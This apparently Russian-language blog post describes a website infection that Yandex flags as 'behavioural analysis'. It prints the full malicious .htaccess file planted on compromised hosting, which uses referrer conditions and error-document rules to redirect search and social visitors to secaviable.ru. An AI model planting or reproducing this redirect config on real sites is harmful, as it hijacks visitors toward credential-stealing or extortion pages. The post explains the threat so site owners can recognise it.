Сегодня столкнулся с тем, что сразу у нескольких сайтов в Яндекс Вебмастере был обнаружен вредоносный код:
При выяснении, что именно за вредоносный код было получено следующее:
Вердикт: Поведенческий анализ.
На вопрос, как разрешить данный инцидент и избавиться от указанного кода, Яндекс не дает никаких вразумительных рекомендаций.
После долгих поисков была найдена следующая информация:
Технологии не стоят на месте. Появился новый вирус который открывает нужные сайты в зависимости от сайтов с которых вы заходите.
Определяется вирус в Яндексе как «Поведенческий анализ».
Вирус может направлять пользователей зашедших на ваш сайт на какие угодно сайты, на сайты с вирусами которые будут воровать ваши пароли или блокировать компьютер и вымогать послать СМС на их номер.
Эти вирусы могут использоваться для накручивания посетителей на сайтах. Также и для раскрутки сайтов поведенческим фактором.
Имея полный доступ к вашим сайтам, преступники могут менять адреса и направлять посетителей на новые и новые ресурсы.
Поисковые системы Яндекс и Google опережают на 1 шаг создателей вирусов и постепенно блокируют подобные зараженные сайты (примерно в течение недели), но если сайт популярный и был взломан то многие посетители за эту неделю могут пострадать.
Заражение происходит из-за кражи паролей от хостинга, либо от взлома хостинга. На хостинг размещается файл .htaccess (вредоносный код сдвинут пробелами, что бы вы его не сразу смогли найти) с таким содержанием:
ErrorDocument 400 http://secaviable.ru/about/index.php
ErrorDocument 401 http://secaviable.ru/about/index.php
ErrorDocument 403 http://secaviable.ru/about/index.php
ErrorDocument 404 http://secaviable.ru/about/index.php
ErrorDocument 500 http://secaviable.ru/about/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://secaviable.ru/about/index.php [R=301,L]
</IfModule>
Источник: smonews.ru
Комментариев нет:
Отправить комментарий